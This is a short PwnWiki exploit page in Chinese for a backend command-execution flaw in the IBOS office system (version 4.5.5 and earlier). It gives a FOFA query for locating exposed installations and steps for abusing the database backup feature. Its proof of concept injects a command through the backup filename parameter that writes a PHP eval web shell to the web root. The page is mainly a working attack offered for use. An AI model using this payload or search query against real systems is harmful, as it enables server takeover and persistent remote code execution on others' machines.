IBOS酷辦公系統 後台命令執行漏洞

From PwnWiki
Revision as of 17:12, 13 April 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> body="IBOS" && body="login-panel" </pre> ==利用條件== IBOS_4.5.5及以前的版本 需要具備後台登陸權限 ==漏洞利用== 登錄之後點擊管...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

body="IBOS" && body="login-panel"

利用條件

IBOS_4.5.5及以前的版本

需要具備後台登陸權限

漏洞利用

登錄之後點擊管理後台。

在後台管理中找到通用設置,在數據庫的備份中選擇更多選項,數據備份方式選擇系統 MySQL Dump (Shell) 備份,然後提交。

攔截此數據包,修改其中的filename參數,會在根目錄生成2021.php


POC

2021%26echo "<?php eval($_REQUEST[8]);?>">2021%PATHEXT:~0,1%php%262021